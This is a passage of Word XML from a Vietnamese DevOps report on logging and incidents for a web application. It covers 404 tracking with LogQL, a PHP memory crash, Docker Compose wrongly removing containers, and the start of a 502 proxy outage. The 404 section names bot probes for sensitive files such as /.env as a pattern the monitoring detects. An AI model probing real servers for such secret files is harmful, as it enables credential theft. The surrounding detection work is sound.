          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3.2. Lỗi truy cập trang không tồn tại mã 404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Người dùng nhập sai đường dẫn, hoặc bot tự động quét các tệp nhạy cảm không tồn tại (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/wp-login.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/.env</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Mã HTTP Response trả về:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 404 Not Found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Quy tắc thu thập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache Access Log JSON ghi nhận </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>"status": 404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Promtail kích hoạt quy tắc bóc tách và gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>log_category="http_traffic"</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Hiển thị trên Grafana:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Panel 6 liệt kê chi tiết URI, Client IP và User-Agent để phân biệt người dùng nhập nhầm hay bot đang dò quét.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cú pháp lọc lỗi LogQL trên Grafana:</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topk(10, sum by (uri) (</w:t>
              <w:br/>
              <w:t xml:space="preserve">    count_over_time({container="ilfreight_web"} | json | status == 404 [15m])</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3.3. Sự cố sập ứng dụng do vượt ngưỡng bộ nhớ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tiến trình kết xuất dữ liệu quá lớn vượt quá mức cấu hình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>memory_limit = 128M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/web/php.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">), phát sinh lỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Fatal error: Allowed memory size exhausted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Mã HTTP Response trả về:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 500 Internal Server Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Apache ngắt kết nối trắng trang).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc thu thập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hàm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneLogger::logShutdown()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>register_shutdown_function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bắt lấy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>error_get_last()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, phát ra JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>"type":"fatal_shutdown_error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>"level":"fatal"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Promtail bắt trọn vẹn và gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>level="error"</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Hiển thị &amp; lọc LogQL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Panel 1 hiển thị thẻ đỏ cảnh báo lỗi nghiêm trọng; lọc bằng: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{container="ilfreight_web", log_category="app_exception"} | json | type == "fatal_shutdown_error" or level == "fatal"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3.4. Sự cố xóa nhầm container giữa hai tệp Compose chạy song song</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Triệu chứng sự cố:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong lượt chạy Production CD (Run #39985446211), Job triển khai hạ tầng quan sát bị thất bại khẩn cấp với thông báo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dependency failed to start: Error response from daemon: No such container...</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Phân tích nguyên nhân gốc rễ sự cố:</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Hai tệp điều phối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.monitoring.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneWeb/docker-compose.prod.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cùng thực thi trong thư mục </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/opt/inlaneweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhưng ban đầu không chỉ định tên dự án riêng biệt.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Mặc định Docker Compose gán tên dự án theo tên thư mục làm việc (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb</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val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi Job Giám sát chạy lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker compose ... up -d --remove-orphans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, Docker Compose xem xét toàn bộ container thuộc dự án </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> không nằm trong tệp monitoring, Docker hiểu nhầm chúng là container mồ côi và tiến hành dừng rồi xóa chúng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Đồng thời, Job Web chạy song song với cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>--remove-orphans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lại xem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_loki</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_grafana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> là mồ côi và xóa bỏ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_loki</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đúng thời điểm Promtail và Grafana đang chờ Loki sẵn sàng. Hai tiến trình tranh chấp và vô tình triệt tiêu lẫn nhau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giải pháp khắc phục:</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sz w:val="26"/>
        </w:rPr>
        <w:t>Phân lập định danh dự án riêng biệt:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khối giám sát được gán </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>name: inlaneweb-monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (chạy với cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>-p inlaneweb-monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">), khối web được gán </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>name: inlaneweb-prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (chạy với cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>-p inlaneweb-prod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">). Nhờ đó, cờ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>--remove-orphans</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉ dọn dẹp các container trong phạm vi nội bộ của chính dự án đó mà không bao giờ chạm tới container của dự án khác.</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sz w:val="26"/>
        </w:rPr>
        <w:t>Tối ưu hóa chạy song song độc lập (Parallel DAG Execution):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nhờ phân lập định danh dự án kết hợp cơ chế kiểm tra nhịp tim độc lập, hai Job triển khai Web và triển khai Giám sát hoàn toàn có thể chạy song song đồng thời mà không hề xung đột, rút ngắn 50% tổng thời gian chuyển giao của Stage 4 mà vẫn đảm bảo an toàn tuyệt đối.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3.5. Sự cố mất kết nối giữa Reverse Proxy và ứng dụng web gây lỗi 502</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Triệu chứng sự cố:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Người dùng truy cập tên miền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>https://inlaneweb.ecotools.online/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bị Cloudflare chặn lại và hiển thị trang thông báo Bad Gateway mã 502. Trong khi đó, lệnh kiểm tra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker ps</w:t>
      </w:r>
      <w:r>
